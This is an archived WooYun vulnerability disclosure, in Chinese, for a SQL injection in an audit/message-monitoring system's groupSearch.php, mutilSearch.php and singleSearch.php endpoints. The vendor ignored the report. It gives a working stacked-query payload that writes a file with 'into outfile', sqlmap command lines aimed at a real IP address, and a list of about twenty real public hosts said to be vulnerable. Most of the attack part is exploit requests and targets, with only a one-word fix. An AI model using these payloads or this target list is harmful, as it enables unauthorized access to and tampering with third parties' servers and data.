乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-17: 积极联系厂商并且等待厂商认领中,细节不对外公开 2016-01-28: 厂商已经主动忽略漏洞,细节向公众公开
rt
该漏洞为SQL注入漏洞,但该系统mysql PDO方式查询,可以执行多条语句,等同于任意SQL语句执行存在漏洞的文件:
/Customize/Audit/MessageMonitor/groupSearch.php?id=1/Customize/Audit/MessageMonitor/mutilSearch.php?id=1/Customize/Audit/MessageMonitor/singleSearch.php?uid=1))
执行select语句向服务器写入文件:
http://218.247.15.55/Customize/Audit/MessageMonitor/groupSearch.php?id=1;select 0x776F6F79756E2E6F7267 into outfile '/tmp/wooyun.txt'%23
用sqlmap测试1:
sqlmap.py -u "http://218.247.15.55/Customize/Audit/MessageMonitor/singleSearch.php?uid=1))*" --random-agent --dbms=mysql
用sqlmap测试2:
sqlmap.py -u "http://218.247.15.55/Customize/Audit/MessageMonitor/groupSearch.php?id=1" --random-agent --dbms=mysql --dbs
使用该系统的非常多,随便列举几个案例:
http://124.127.184.106/Customize/Audit/MessageMonitor/groupSearch.php?id=1http://218.247.15.55/Customize/Audit/MessageMonitor/groupSearch.php?id=1http://220.249.78.238/Customize/Audit/MessageMonitor/groupSearch.php?id=1http://221.2.165.51/Customize/Audit/MessageMonitor/groupSearch.php?id=1http://114.112.88.208/Customize/Audit/MessageMonitor/groupSearch.php?id=1http://61.186.41.230/Customize/Audit/MessageMonitor/groupSearch.php?id=1http://61.128.175.188:8000/Customize/Audit/MessageMonitor/groupSearch.php?id=1http://120.33.48.13:81/Customize/Audit/MessageMonitor/groupSearch.php?id=1http://120.33.48.12:81/Customize/Audit/MessageMonitor/groupSearch.php?id=1http://116.228.58.90:81/Customize/Audit/MessageMonitor/groupSearch.php?id=1http://218.247.15.55/Customize/Audit/MessageMonitor/groupSearch.php?id=1http://60.2.187.226:81/Customize/Audit/MessageMonitor/groupSearch.php?id=1http://60.2.41.246/Customize/Audit/MessageMonitor/groupSearch.php?id=1http://221.5.224.65:8000/Customize/Audit/MessageMonitor/groupSearch.php?id=1http://58.118.64.9/Customize/Audit/MessageMonitor/groupSearch.php?id=1http://42.49.39.72:81/Customize/Audit/MessageMonitor/groupSearch.php?id=1http://114.247.46.73/Customize/Audit/MessageMonitor/groupSearch.php?id=1http://183.64.106.66/Customize/Audit/MessageMonitor/groupSearch.php?id=1http://219.148.143.126:81/Customize/Audit/MessageMonitor/groupSearch.php?id=1http://122.10.19.52/server/page_download http://220.249.78.238/Customize/Audit/MessageMonitor/groupSearch.php?id=1http://211.142.200.34/Customize/Audit/MessageMonitor/groupSearch.php?id=1http://221.224.21.25:8888/Customize/Audit/MessageMonitor/groupSearch.php?id=1
过滤
未能联系到厂商或者厂商积极拒绝
漏洞Rank:15 (WooYun评价)